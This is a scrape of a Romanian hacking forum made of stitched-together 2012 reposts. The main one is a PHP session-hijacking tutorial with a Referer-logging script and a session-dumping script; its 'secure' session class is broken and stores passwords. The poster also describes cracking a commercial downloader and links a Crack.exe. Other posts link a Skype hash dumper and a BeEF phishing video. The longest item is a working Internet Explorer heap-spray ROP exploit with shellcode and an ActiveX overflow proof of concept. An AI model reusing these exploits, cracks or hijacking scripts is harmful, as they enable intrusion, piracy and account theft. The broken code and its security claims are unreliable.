Nytro

PHP Session ID’s – The Risks Adrian Stolarski December 31, 2012 In today’s article I want to address a very important topic. Namely, I want to talk about PHP session security. I know and understand that this is a very broad topic, but is also extremely interesting. PHP, even though it is simple and intuitive, is considered bad language if you want to write any halfway complex software. Why is that? The fault lies not with the language itself, but the programmers and administrators who do not understand it. This article will show you how to attack a session mechanism. Use browsers weakness PHP generally has two options for the transmission of session IDs. Both of them are very interesting from our point of view. The first is to transfer the session identifier in the address, so the session ID is then available to the public. The second way is a much safer route, and it is to use cookies. Although it may be safer to use a cookie, it does not give you 100% security. Well, what happens when you’re on my side, and I’ll start to collect all the information of your cookies? All cookies, which are generated by visiting your favorite web sites, such as logging into the post office or a paid service? For me, the first solution is interesting and shows the lack of creativity of developers and administrators of the servers on which PHP is installed. The understanding of the written code can be very difficult though. The first method is to simply transfer session using the GET array. Here is an example: Example Domain b537a69ac366e85208de Beautiful, is it not? Do you know why it is still used? Many developers and administrators are afraid that users will block their browsers ability to receive cookies. It is responsible for the session.use_trans_sid option in php.ini. You know what risks it brings? With redirection, most browsers use this header: Referrer: Google Of course this is just an example. The contents of the header may be different, but it’s actually irrelevant. In the header, all the information about the previously visited site is transmitted. This header is sent only when we move to another page by clicking a link, rather than typing the address in your browser. Do you have a page where pop up ads always display in your browser? It annoys me like heck. I cannot look at them. What do I do? Buy a crafted link to my website on your website. Of course, I do side with a high click-through rate. My beautiful site will also contain a one very malicious script. Here’s the code: <?php if(isset($_SERVER['HTTP_REFERER'])){ $file=fopen("devilishchuckle.txt", "a"); fputs($file, $_SERVER['HTTP_REFERER']."\r\n"); fclose($file); } ?> The operation of a hacker script is as follows. $ _SERVER Is a superglobal command. First, we look at whether it initiated HTTP_REFERER as part of the $ _SERVER, then open the specified file, save and close the file. Beautiful and how easy to use. This can be compared to the iPhone and rotten apples. Everyone clicks on the link, it automatically will give your session id to the hacker, and the hacker will be able to log in as that person and destroy the credibility of the portal. Social engineering This is something that neither that is not immune to neither methods. Social engineering is described in the following articles: InfoSec Institute Resources – Social Engineering – We Start Playing InfoSec Institute Resources – Social Engineering 2—What Do We Have To Watch? How does this relate to PHP? Describe two stories, both show the extent of human stupidity and never be disappointed. Both have happened. Here they are: The first corresponds exactly to that of the writing. Once I managed to persuade someone to do something for me, nothing major, such as logging on to your e-mail account, and then send me the URL and your browser cookies. Then I showed that person what you can do with the data, which is willingly given. It was ridiculously easy. The other one is even more humorous. Once I entered the chat and pretended to be a lady, I got into a conversation with a desperado. He wanted a photo. I ordered him to give me an e-mail address. The guy did it without any resistance. I then waited for him to send me a photo. Then I asked why it had not come. I figured that mine crashes, it’s a mistake, and that he must give me the password to his e-mail address, and I will write to him from there. The first thing I did was to hurry and change his password to the e-mail. Sometimes it is exciting that we give their personal details to other strangers. However, I always try to verify the identity of people and do not give away precious private information to strangers. This is the principle, which is always observed. The possibility of session hijacking, having access to the server There is another thing that we must remember. If we have our website on a public server, where we are never alone, in addition to the normal users, public servers are filled with bad, lazy hackers. If the administrators are lazy, it can have serious consequences. Lazy administrators always leave something like a default PHP configuration set. That is the path to save the session. By default, PHP is /tmp, the location of which is really somewhere all users can read. It is enough that this lists the directory, but you can also view the session IDs. If we host the website in a large server, if known, will surely have a lot of sites hosted on it. This way, we can get a really large number of session IDs. Now, how to find the ones that interest us? Believe me, you do not have to use the same session ID. In a very simple way you can pull data from each session. define("SESSION_DIR", "/tmp/session/"); // session dir define("START", 5); // need to substr, the number of sessions depends on the name define("END", 32); // need to substr, the number of session depends on the name if(!isset($_GET['id'])){ $directory = opendir(SESSION_DIR); while($files=readdir($directory)){ $files = substr($files, START, END); echo "<a href=\"session.php?id=".$files."\">".$files."</a><br>"; } } else { session_id($_GET['id']); session_start(); foreach($_SESSION as $variable => $value){ echo $variable."=".$value."<br>"; } $directory = opendir(SESSION_DIR); while($files = readdir($dir)){ $files = substr($files, START, END); echo "<a href=\"session.php?id=".$files."\">".$files."</a><br>"; } } ?> As you can see our hacker script is very simple, yet very useful. It displays all session IDs. When you click on the ID, it shows us the data from the session id. Of course, that can also be defended. What is the fastest way to do so? Well, we can always change the path of data recording session, to a path that will be less available. However, just taking this step does not offset the risk as it exists as long as the user can list the directory. The next thing you should do is put each account in the Apache chroot or jail. This solution is also not the best as the amount of space that should be used varies. It is of course better idea to put set safe_mode to ON in php.ini. This way, no one will be able to be able to list the directory with the PHP sessions. Of course, we still have a problem with people who have shell accounts. Just remember that if I set the chmod, they also will not do too much. So how do we create a secure session id? In this article I strongly criticized mechanisms available in PHP sessions. This is still not the ultimate solution as to run completely secure. At the end of this article I want to show an alternative way to generate session IDs in PHP. Perhaps it is not as powerful as the one that already is in PHP, but it sure is safer and much easier to use. The main difference in the class below will rely on the fact that the problem has been completely easy to gather the session ID. You can read more about passwords in the following article: InfoSec Institute Resources – Best Practices When Creating Passwords As a hash of the password, the data used browser and IP address data. As a result, the session ID is created, which completely avoids what is called the birthday problem. That is when the browser gives so much data that it is impracticable to two people handling the same password. The class is really very simple, and to generate the session ID hash function we use md5() because there is no point if you are using something else such as Mcrypt. Below is the full code of a simple class to generate session IDs: <?php define("BUFFER_SIZE", 1024); define("SESSION_PATH", "user_sessions/"); define("SEPARATOR", "="); define("END_LINE", "\r\n"); class SessionIDGenerator { public function __construct(){ } public function sessionStart(&$session_array){ if(file_exists(SESSION_PATH.userHash())){ $file = fopen(SESSION_PATH.userHash(), "r"); flock($file, LOCK_SH); while($line = fgets($file, BUFFER_SIZE)){ list($variable, $value) = explode(SEPARATOR, $line); $session_array[trim($variable)] = trim($value); } flock($file, LOCK_UN); fclode($file); } else { $file = fopen(SESSION_PATH.userHash(), "w"); fclose($file); } } public function sessionClose(&$session_array){ if(file_exists(SESSION_PATH.userHash()) || isset($session_array)){ file = fopen(SESSION_PATH.userHash(), "w"); foreach($session_array as $variable => $value){ flock($file, LOCK_EX); fputs($file, $variable.SEPARATOR.$value.END_LINE); flock($file, LOCK_UN); } fclose($file); unset($session_array); return true; } else { return false; } } public function sessionDestroy()(&$session_array){ unlink(SESSION_PATH.userHash(); unset($session_array); return; } private function userHash(){ return md5($_SERVER['REMOTE_ADDR'].$_SERVER['user_agent']); } } ?> Now we have a mechanism to generate session IDs. How can I put it to use? It is also very simple. See for yourself: <?php $sessionIdGenerator = new SessionIdDenerator; $sessionIdGenerator->sessionStart(&$SessionArray); $SessionArray['login'] = "user"' $SessionArray['password'] = "password"; $sessionIdGenerator->sessionClose(); ?> At the moment, it makes no sense to write your own session management mechanism. Mechanisms built into PHP can quietly handle it. We just took a little bit better protection mechanisms in PHP sessions than standard. Summary The fact that even I took the PHP language testifies to its extraordinary popularity. In a previous article on PHP: InfoSec Institute Resources – Nine Wishes for Your PHP Applications I mentioned this to my requests for application developers. Today I raised another very important issue: the dangers associated with the session IDs. This is very important because a lot of hackers could create a mess. Although this is not the focus of this article, you should know that each session shown has expired. If it starts to use the information contained in this article, you have to be very hurried. There is, however, such a thing as a long-term session. So if we do not protect the programmer through good session ID generation, we probably won’t against long-term sessions. One day I’ll show you how we should write a much better session mechanism than the one built in to PHP. That is not the focus of today’s article. You should seriously consider the combinations if you are using the mechanism of the session. You can share user data stored in the database as part of the cookie, but the other part stored in the session. Mechanisms for handling session data are the most important for anyone who writes PHP applications. Therefore it is really worth it to devote a lot more time than some other PHP elements. I greet you and wish you many safe and successful PHP projects in the future. Sursa: InfoSec Institute Resources – PHP Session ID’s – The Risks

[h=1]Qubes 2 Beta 1![/h]by Mayuresh on December 31, 2012 Our first post regarding the Qubes OS can be found here. A few days ago Qubes 2 Beta 1 was released! This is the first Beta for Qubes Release 2 and introduces generic support for fully virtualized AppVMs (called HVMs in common Xen speak), and specifically initial support for Windows-based AppVMs integration. “Qubes implements Security by Isolation approach. To do this, Qubes utilizes virtualization technology, to be able to isolate various programs from each other, and even sandbox many system-level components, like networking or storage subsystem, so that their compromise don’t affect the integrity of the rest of the system. Qubes lets the user define many security domains implemented as lightweight Virtual Machines (VMs), or “AppVMs”. E.g. user can have “personal”, “work”, “shopping”, “bank”, and “random” AppVMs and can use the applications from within those VMs just like if they were executing on the local machine, but at the same time they are well isolated from each other. Qubes supports secure copy-and-paste and file sharing between the AppVMs, of course.” [h=2]Changes made to Qubes:[/h] Support for generic fully virtualized VMs (without qemu in the TCB!) Support for Windows-based AppVMs integration (clipboard, file exchange, qrexec, pv drivers) Secure audio input to select AppVMs (Hello Skype users!) Clipboard is now also controlled by central policies, unified with other qrexec policies. Out of the box TorVM support Experimental support for PVUSB Updated Xorg packages in Dom0 to support new GPUs DisposableVM customization support … and, as usual, various fixes and other improvements Something new this time – unlike the rest of Qubes, which is distributed under a GPL v2 license, the Qubes Windows Support Tools are not open sourced and are distributed as binaries only, under a proprietary license. They are free to use for any Qubes 2 user. The tools are not part of the Qubes 2 installation ISO (which is GPL), and are down loadable on demand. Download Qubes: Qubes 2 Beta 1 – Qubes-R2-Beta1-x86_64-DVD.iso Sursa: Qubes 2 Beta 1! — PenTestIT

Skype Hash Dumper 1.0 Authored by Kevin Devine This is a tool that demonstrates dumping MD5 password hashes from the configuration file in Skype. Download: http://packetstormsecurity.com/files/download/119155/skype_dump.zip Sursa: Skype Hash Dumper 1.0 ? Packet Storm

Inca exista persoane cu acea mentalitate "old school" care fac totul din placere si NU pentru bani. Cat timp vor exista astfel de persoane, "scena" va exista. Nu ne trebuie banii vostri, prefer sa iti dau VIP daca dai acei bani pentru o carte si imi demonstrezi ca ai citit-o si ca ai invatat ceva din ea, pentru ca apoi si altii sa invete de la tine. E trist sa vad cat de usor banii pot distruge pasiunea...

5

Da, acum l-am vazut si eu, imi place Iei, imi descarca automat to playlistu

Autor: Nytro © Romanian Security Team 2012 De obicei ascult muzica pe Youtube dar azi mi s-a pus pata sa imi descarc melodiile pe care le aveam in playlist. Si incerc eu niste site-uri, vad ca merg naspa, apoi caut si descarc un program pe care il gasesc aici: YouTube MP3 Downloader - Descarca - RO - Download.CHIP.eu . Pare ok, aranjat, cand colo, ma trezesc ca imi descarca/converteste doar jumatate de melodie. Cum tot nu aveam ce face, am zis sa incerc sa ii fac un crack. Primul pas si cel care mi-a luat cel mai mult timp a fost sa gasesc unde se face verificarea serialului. Se putea face simplu cautand mesajul de eroare: 007D8B51 . C785 3CFFFFFF >MOV DWORD PTR SS:[EBP-C4],Download.00638>; UNICODE "Invaild Regstration Code." Am gasit pana la urma unde se face verificarea serialului dupa ceva chin: Pur si simplu in locul unui jnz care nu se executa pun un jmp. Nu era practic verificarea serialului, ci doar o verificare anterioara. .text:007D8AF7 test eax, eax Insa apoi se face verificarea si la fel, se face un salt catre portiunea de cod care ne arata ca serialul este incorect. O simpla transformare din jnz in jz e de ajuns. Procedura .text:007D9323 loc_7D9323: Fiind apelata de .text:007D8FAB jnz loc_7D9323 Am avut ceva probleme cu mai multe exceptii insa am trecut peste. Nu va recomand IDA deoarece nu poate "patch-ui" direct executabilul. In primul rand trebuie modificat ceva in config pentru a avea disponibil meniul de "Patch", apoi se creaza un "diff" cu ajutorul caruia se patch-uieste programul. Mai multe detalii aici: Marco Ramilli's Blog: How to Patch Binary with IDA Pro Patch-ul este banal: This difference file is created by The Interactive Disassembler Downloader.exe 003D8AF9: 0F E9 003D8AFA: 84 66 003D8AFB: 65 01 003D8AFC: 01 00 003D8FAC: 85 84 Iar in teste, programul crack-uit pare sa accepte orice serial: Am reinstalat programul, facea aceleasi figuri, am pus crack-ul in locul lui si pare sa functioneze, sa accepte orice serial: Bine, nu stia daca il putem denumi "crack" dar cam asta e. Si in sfarsit imi descarca si mie toata melodia: "CIA - Suntem tot aici.mp3" Download crack: https://rstforums.com/proiecte/Crack.exe Mirrors: http://www.speedyshare.com/2M4sa/Crack.exe http://www18.zippyshare.com/v/38589448/file.html PS: Puteti compara cu originalul, folositi "Compare It" sau orice altceva pentru a verifica diferentele, sunt doar vreo 5 bytes diferiti. Setup: http://download.chip.eu/ro/YouTube-MP3-Downloader_6745448.html Thanks, // Nytro

Nu am baut nimic, dar sa fiu al dracu de am inteles ceva din tot carnatu asta. Nu am intrat in topicu cu "Unde faci Revelionul", dar intru acum, pentru ca sunt sigur ca e mai interesant. Nu va tine nimeni cu forta aici. Faptul ca sunteti aici e un privilegiu, nu un drept si in niciun caz o obligatie. Sunt sarbatorile, stau pe RST mai mult decat ar trebui, ar trebui sa imi bag pula in voi, ca nu meritati nimic, nu sa stau pe aici.

Da, hash-urile sunt citite din /etc/shadow, deci ai nevoie de root pentru a le putea citi...

Crack Linux Hashes Using Metasploit Framework Description: In this video I will show you how to crack Linux hashes using the Metasploit framework auxiliary module and make sure that your Database is connected with Metasploit – Framework or you will get errors. I’m using John the Ripper Auxiliary modules this module will allow you to crack your hashes and you can read your password in plain text but you have to use the dictionary for the brute-force attack. This module uses John the Ripper to identify weak passwords that have been acquired from unshadowed passwd files from Unix systems. The module will only crack MD5 and DES implementations by default. Set Crypt to true to also try to crack Blowfish and SHA implementations. Warning: This is much slower. John the Ripper Linux Password Cracker | Metasploit Exploit Database (DB) Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Crack Linux Hashes Using Metasploit Framework

Sploitego - Maltego's (Local) Partner In Crime Description: PDF : - https://media.defcon.org/dc-20/presentations/Douba/DEFCON-20-Douba-Sploitego.pdf Extra : - https://media.defcon.org/dc-20/presentations/Douba/Extras.zip Have you ever wished for the power of Maltego when performing internal assessments? Ever hoped to map the internal network within seconds? Or that Maltego had a tad more aggression? Sploitego is the answer. In the presentation we'll show how we've carefully crafted several local transforms that gives Maltego the ooomph to operate nicely within internal networks. Can you say Metasploit integration? ARP spoofing? Passive fingerprinting? SNMP hunting? This all is Sploitego. But wait - there's more. Along the way we'll show you how to use our awesome Python framework that makes writing local transforms as easy as 'Hello World'. Sploitego makes it easy to quickly develop, install, distribute, and maintain Maltego Local transforms. The framework comes with a rich set of auxiliary libraries to aid transform developers with integrating attack, reconnaissance, and post exploitation tools. It also provides a slew of web tools for interacting with public repositories. Sploitego and its underlying Python framework will be released at DEF CON as open source - yup - you can extend it to your heart's content. During the presentation we'll show the awesome power of the tool with live demos and scenarios as well as fun and laughter. Nadeem Douba - GWAPT, GPEN: Currently situated in the Ottawa (Ontario, Canada) valley, Nadeem is a senior research analyst at Cygnos Information Security (a Raymond Chabot Grant Thornton company). Nadeem provides technical security consulting services to various clients in the health, education, and public sectors. Nadeem has been involved within the security community for over 10 years and has frequently presented at ISSA and company sponsored seminars and training sessions. He is also an active member of the open source software community and has contributed to projects such as libnet, Backtrack, and Maltego. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Sploitego - Maltego's (Local) Partner In Crime

Hacking The Google Tv Description: PDF : - https://media.defcon.org/dc-20/presentations/Xenofex/DEFCON-20-Xenofex-Panel-Hacking-the-GoogleTV.pdf The GoogleTV platform is designed to bring an integrated web experience, utilizing the Chrome web browser and Android applications, to your television. GoogleTV is based on the Android operating system, which is mainly used in tablets and smart phones, but customized with security features not normally seen on most Android devices. The current version of the platform utilizes signatures to establish a “chain of trust” from bootloader to system applications. This presentation will focus on the current GoogleTV devices, including X86 platform details, and the exhaustive security measures used by each device. The presentation will also include video demonstrations of previously found bugs and exploits for each GoogleTV device and includes specific details about how each bug works. Furthermore, we will include interesting experiences that the team has encountered along the way. Finally the talk will be capped off with the release of multiple unpublished GoogleTV exploits which will allow unsigned kernels across all x86 devices (Revue / Sony GoogleTV). Amir "Zenofex" Etemadieh founded the GTVHacker group and has been working on the GTVHacker project from its initial start in November 2010. Amir has done independent security research in consumer electronics including the Logitech Revue, Ooma Telo, Samsung Galaxy S2, Boxee Box and services such as the 4G Clear Network finding both hardware and software flaws. Twitter: @zenofex GTV Hacker GTVHacker CJ Heres is an IT consultant during the day, tinkerer at night. He enjoys examining and repairing all sorts of devices from cars to blu-ray players. His philosophy is to use a simple approach for complex problems. CJ’s recent work includes Sony GoogleTV, Boxee Box, and Vizio Smart TV’s. Twitter: @cj_000_ Dan Rosenberg Dan Rosenberg is a vulnerability researcher who takes sick pleasure in exploiting anything with a CPU. He once punched an Android in the face. Twitter: @djrbliss Tom "tdweng" Dwenger is a software engineer who has been developing and reversing Android for the last 2 years. Tom is known for being able to quickly reverse Android applications and has been an active member of the GTVHacker team since its initial start in 2010. Twitter: @tdweng Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Hacking The Google Tv

Demorpheus: Getting Rid Of Polymorphic Shellcodes In Your Network Description: One of the most effective techniques used in CTF is the usage of various exploits, written with the help of well-known tools or even manually during the game. Experience in CTF participation shows that the mechanism for detecting such exploits is able to significantly increase the defense level of the team. In this presentation we propose an approach and hybrid shellcode detection method, aimed at early detection and filtering of unknown 0-day exploits at the network level. The proposed approach allows us to summarize capabilities of shellcode detection algorithms developed over recent ten years into optimal classifiers. The proposed approach allows us to reduce the total fp rate almost to 0, provides full coverage of shellcode classes detected by individual classifiers and significantly increases total throughput of detectors. Evaluation with shellcode datasets, including Metasploit Framework 4.3 plain-text, encrypted and obfuscated shellcodes, benign Win32 and Linux ELF executables, random data and multimedia shows that hybrid data-flow classifier significantly boosts analysis throughput for benign data - up to 45 times faster than linear combination of classifiers, and almost 1.5 times faster for shellcode only datasets. Svetlana Gaivoronski is a PhD student at Computer Systems Lab, Computer Science Dept. of Moscow State University, Russia. Svetlana is a member of the Bushwhackers CTF team which shows the following results in recent years: 2nd place in Deutsche Post Security Cup 2010, 6th place in the final of ruCTF 2012 (8th at qualification), 12th place at ruCTF Europe 2011, 4th place in the final of ruCTF 2011 (and 1st at qualification), etc. Svetlana works at Redsecure project (experimental IDS/IPS) at Moscow State University. Her primary interests are network worms propagation detection and filtering, shellcode detection, static and runtime analysis of malware. Twitter:@SadieSV lvk.cs.msu.su/~sadie Dennis Gamayunov holds a PhD and works as Senior Researcher at Computer Systems Lab, Computer Science Dept. of Moscow State University, Russia. Dennis is the leader of the small network security research group in MSU, project lead of the experimental event-driven and natively multicore Redsecure IDS/IPS, founder of Bushwhackers CTF team, with primary research and practical interests in network level malcode detection, high-speed traffic processing (including FPGA-based), and OS security with fine-grained privilege separation, SELinux and beyond. Twitter: @jamadharma http://redsecure.ru/team/denis-gamayunov PDF : - https://media.defcon.org/dc-20/presentations/Svetlana-Gaivoronski/DEFCON-20-Svetlana-Gaivoronski-Demorpheus.pdf Extra : - https://media.defcon.org/dc-20/presentations/Svetlana-Gaivoronski/Extras.zip Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Demorpheus: Getting Rid Of Polymorphic Shellcodes In Your Network

New Techniques In Sqli Obfuscation: Sql Never Before Used In Sqli Description: SQLi remains a popular sport in the security arms-race. However, after analysis of hundreds of thousands of real world SQLi attacks, output from SQLi scanners, published reports, analysis of WAF source code, and database vendor documentation, both SQLi attackers and defenders have missed a few opportunities. This talk will iterate through the dark corners of SQL for use in new obfuscated attacks, and show why they are problematic for regular-expression based WAFs. This will point the way for new directions in SQLi research for both offense and defense. Nick Galbreath is a director of engineering at Etsy, overseeing groups handling fraud, security, authentication and internal tools. Over the last 18 years, Nick has held leadership positions in number of social and e-commerce companies, including Right Media, UPromise, Friendster, and Open Market, and has consulted for many more. He is the author of "Cryptography for Internet and Database Applications" (Wiley), and was awarded a number of patents in the area of social networking. He holds a master's degree in mathematics from Boston University. Twitter: @ngalbreath client9 https://github.com/client9 PDF : - https://media.defcon.org/dc-20/presentations/Galbreath/DEFCON-20-Galbreath-SQLi-Obfuscation.pdf Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: New Techniques In Sqli Obfuscation: Sql Never Before Used In Sqli

Beef Framework Petty Theft Description: In this video i will show you how to perform social engineering after hooking the browser. Lets see if you made a website that website need a logging credential so in between you can use your Technic and use some social engineering to steal Facebook or any other password using your custom logos. This video is all about phishing using BeEF Browser Exploitation Framework. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Beef Framework Petty Theft

Heap spraying in Internet Explorer with rop nops Lately I have been learning to write some exploits for some of my old discovered vulnerabilities to get it working on Windows 7 with IE9. Previously when exploiting vulnerabilities my POCs had always been on Windows XP IE6 just to make sure it worked and not having to worry about all the mitigations in later versions. In this post I am just sharing some basic info which will hopefully to help others when writing/understanding exploits for the first time while at the same time keeping it simple and not worrying to much about performance or precision. In my old exploits I used the heap spraying code below when testing on IE6. (Just removed the un from unescape as Symantec’s Endpoint Protection doesnt like it in this section, maybe they are just too close to each other as the following unescapes are fine) <SCRIPT language="JavaScript"> var calc, chunk_size, headersize, nopsled, nopsled_len; var heap_chunks, i; calc = escape("%ucccc?"); chunk_size = 0x40000; headersize = 0x24; nopsled = escape("??"); nopsled_len = chunk_size - (headersize + calc.length); while (nopsled.length < nopsled_len) nopsled += nopsled; nopsled = nopsled.substring(0, nopsled_len); heap_chunks = new Array(); for (i = 0 ; i < 1000 ; i++) heap_chunks[i] = nopsled + calc; </SCRIPT> From IE8 things had changed not only because it supported DEP but heap spraying for the above code did not spray the heap. After going through some exploits a realised the only change from the above code I really had to make was by spraying the heap using “substring” function. So the code would now look like this code = nopsled + calc; heap_chunks = new Array(); for (i = 0 ; i < 1000 ; i++) heap_chunks[i] = code.substring(0, code.length); Trying this heap spray code now on Windows 7 with IE9 again failed to spray. After reading Peter Van Eeckhoutte’s heap spraying tutorial on how heap spraying was achieved in IE9 got me thinking to see if I could simplify the code and after a few tests it literately came down to just changing one byte in each chunk. So my final spray code ended up is adding a count to each chunk just to make it unique for (i = 0 ; i < 1000 ; i++) { codewithnum = i + code; heap_chunks[i] = codewithnum.substring(0, codewithnum.length); } This code would now spray on all IE browsers and execute our payload on machines that did not support DEP. With machines supporting DEP a ROP chain is required to make our code executable. For this I decided to use ROP chains generated by mona on library msvcr71.dll which gets shipped with Java 6 and is a non-ASLRed. Due to jumping to our first gadget needed to be precise I wanted to write a javascript code where our sprayed chunks will be full of rop nops saving me the trouble of calculating the precise offset as offsets might vary from different OS’es plus landing in another chunk might have another offset. Alignment is still an issue at times but just incrementing or decrementing our used return address normally solves the issue. So each chunk would only have one rop + calc shellcode at the end of the chunk instead of multiple shellcode blocks in a chunk. All I did was change the nopshed value to nopsled = unescape("%q6224?"); // 0x7c376224 RETN [MSVCR71.dll] Putting it all together we now get a working script for Internet Explorer 6/7/8 and 9. (I had to replace the u with a q otherwise the formatting on the browser gets messed up). <SCRIPT language="JavaScript"> function padnum(n, numdigits) { n = n.toString(); var pnum = ''; if (numdigits > n.length) { for (z = 0; z < (numdigits - n.length); z++) pnum += '0'; } return pnum + n.toString(); } var rop, calc, chunk_size, headersize, nopsled, nopsled_len, code; var heap_chunks, i, codewithnum; // // !mona rop -m msvcr71.dll // * changed from default mona rop chain output // rop = unescape( "%q2e4d%q7c36" + // 0x7c362e4d, # POP EBP # RETN "%q2e4d%q7c36" + // 0x7c362e4d, # skip 4 bytes "%qf053%q7c34" + // 0x7c34f053, # POP EBX # RETN "%q00c8%q0000" + // 0x000000c8, # 0x000000c8-> ebx (size 200 bytes) * "%q4364%q7c34" + // 0x7c344364, # POP EDX # RETN "%q0040%q0000" + // 0x00000040, # 0x00000040-> edx "%qf62d%q7c34" + // 0x7c34f62d, # POP ECX # RETN "%qe945%q7c38" + // 0x7c38e945, # &Writable location "%q496e%q7c36" + // 0x7c36496e, # POP EDI # RETN "%q6c0b%q7c34" + // 0x7c346c0b, # RETN (ROP NOP) "%q2adb%q7c37" + // 0x7c372adb, # POP ESI # RETN "%q15a2%q7c34" + // 0x7c3415a2, # JMP [EAX] "%q4edc%q7c34" + // 0x7c344edc, # POP EAX # RETN "%qa151%q7c37" + // 0x7c37a151, # ptr to &VirtualProtect() - 0x0EF * "%q8c81%q7c37" + // 0x7c378c81, # PUSHAD # ADD AL,0EF # RETN "%q5c30%q7c34"); // 0x7c345c30, # ptr to 'push esp # ret ' // // ruby msfpayload windows/exec cmd=calc.exe J // windows/exec - 200 bytes // http://www.metasploit.com // VERBOSE=false, EXITFUNC=process, CMD=calc.exe // calc = unescape( "%qe8fc%q0089%q0000%q8960%q31e5%q64d2%q528b%q8b30" + "%q0c52%q528b%q8b14%q2872%qb70f%q264a%qff31%qc031" + "%q3cac%q7c61%q2c02%qc120%q0dcf%qc701%qf0e2%q5752" + "%q528b%q8b10%q3c42%qd001%q408b%q8578%q74c0%q014a" + "%q50d0%q488b%q8b18%q2058%qd301%q3ce3%q8b49%q8b34" + "%qd601%qff31%qc031%qc1ac%q0dcf%qc701%qe038%qf475" + "%q7d03%q3bf8%q247d%qe275%q8b58%q2458%qd301%q8b66" + "%q4b0c%q588b%q011c%q8bd3%q8b04%qd001%q4489%q2424" + "%q5b5b%q5961%q515a%qe0ff%q5f58%q8b5a%qeb12%q5d86" + "%q016a%q858d%q00b9%q0000%q6850%q8b31%q876f%qd5ff" + "%qf0bb%qa2b5%q6856%q95a6%q9dbd%qd5ff%q063c%q0a7c" + "%qfb80%q75e0%qbb05%q1347%q6f72%q006a%qff53%q63d5" + "%q6c61%q2e63%q7865%q0065"); // chunk_size = 0x40000; headersize = 0x24; nopsled = unescape("%q6224%q7c37"); // 0x7c376224 RETN [MSVCR71.dll] nopsled_len = chunk_size - (headersize + rop.length + calc.length); while (nopsled.length < nopsled_len) nopsled += nopsled; nopsled = nopsled.substring(0, nopsled_len); code = nopsled + rop + calc; heap_chunks = new Array(); for (i = 0 ; i < 1000 ; i++) { codewithnum = padnum(i,4) + code; heap_chunks[i] = codewithnum.substring(0, codewithnum.length); } </SCRIPT> Here are two images from the top and bottom of one of the chunks. One thing to note is that the calc shellcode size in the above example is 200 bytes and this size needs to be set in our rop chain. Due to the fact that the shellcode is at the bottom of the chunk if the size used by VirtualProtect is greater than our shellcode it reads past the chunk leading to an invalid address and triggering an exception. Here is an example of an exploit I wrote for testing purposes. I discovered this one quite some time ago. The ActiveX library awApi4.dll from “Vantage Linguistics AnswerWorks” contains a number of vulnerable stack-based buffer overflow methods. The Secunia advisory link is here. The ActiveX control had been killbitted at the time with a Microsoft patch MS07-069/942615. <OBJECT classid="clsid:C1908682-7B2C-4AB0-B98E-183649A0BF84" id="poc"> </OBJECT> <SCRIPT language="JavaScript"> var buffer = ""; for (i = 0; i < 215; i++) buffer += unescape("%41") buffer += unescape("%23%62%37%7c") // 0x7c376223 POP EAX # RETN buffer += unescape("%42%42%42%42") // compensate buffer += unescape("%42%42%42%42") // compensate buffer += unescape("%08%08%08%08") // fill return address buffer += unescape("%a9%13%34%7c") // XCHG EAX,ESP # MOV EAX,DWORD // PTR DS:[EAX] #PUSH EAX #RETN buffer += unescape("%24%62%37%7c") // 0x7c376224 RETN for (i = 0; i < 20; i++) buffer += unescape("%43") poc.GetHistory(buffer); </SCRIPT> This exploit has been tested and works 100% on Windows XP SP3 IE 6/7/8 and Windows 7 SP1 IE 8/9. I have included the vulnerable library, registry files to remove/add killbits and the exploit in a zip file that can be downloaded from here. The zip file has a md5 hash of d219582269ee0845f8747d0b64910f71 and the password for the zip file is “answerworks” without quotes. If you find when testing the exploit Windows Calculator fails to load then check if msvcr71.dll library is loaded in IE’s process space as I had noticed on one of my test machines that it does not load up. This heap spraying code should work well for exploiting buffer overflows but exploiting virtual function calls is something I’ll need to look into and on my to-learn-list. On Windows 7 the only real dependency lies in having Java 6 installed as the library msvcr71.dll which comes with Java 6 is not ASLRed or gets rebased. If Java 7 is installed then another rop chain would need to be used as Java 7 libraries are all ASLRed. Windows XP is not subject to ALSR so another rop chain could be used if Java 6 is not installed. References: Security Advisory SA26566 - Vantage Linguistics AnswerWorks 4 API ActiveX Control Buffer Overflow - Secunia Security Vulnerability Patch for iSEEK AnswerWorks Desktop Help Search Microsoft Security Bulletin MS07-069 - Critical : Cumulative Security Update for Internet Explorer (942615) https://www.corelan.be/index.php/2011/12/31/exploit-writing-tutorial-part-11-heap-spraying-demystified/ Sursa: Heap spraying in Internet Explorer with rop nops | GreyHatHacker.NET

Exploiting and mitigating Java exploits in Internet Explorer This year we’ve seen a number of 0 day Java exploits surfacing and various mitigating steps mentioned in various sites that could be taken to prevent us from being compromised. A lot of these mitigating steps vary from each other so when it comes to mitigate Java in Internet Explorer it adds doubt to which is the best mitigation steps to follow. Uninstalling Java would obviously solve the problem but that is not really an option in organisations dependant on Java. This post describes the mitigating steps available, the tests carried out and how to bypass certain mitigations. The tests have been carried out on a fully patched Windows 7 Enterprise 32bit virtual machine with Internet Explorer 8 and a vulnerable version of Java. Prevent loading of applet in IE’s “Internet Zone” This setting disables the loading of Java applets from the Internet zone. There are different keys representing different security zones [3] and the Internet zone has a value of 3. ; First set the URLAction to control APPLET behavior ; Zone 3 is the Internet zone ; 1C00 is the Java invocation policy ; "1C00"=dword:00000000 <-- disable loading of Java applet ; "1C00"=dword:00010000 <-- enable loading of Java applet ; [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3] "1C00"=dword:00000000 HKEY_CURRENT_USER (HKCU) entry would take priority first. So if disabled in HKEY_LOCAL_MACHINE (HKLM) but enabled in HKCU then you will still be exploited so it is best just to apply the change in HKCU. Any external site attempting to use an applet tag will now not load the applet and a notification bar will be displayed. This mitigation would only protect from applet tag examples below. With other techniques this mitigation is ineffective. <APPLET archive="calc.jar" code="Exploit.class" width="1" height="1"></APPLET> 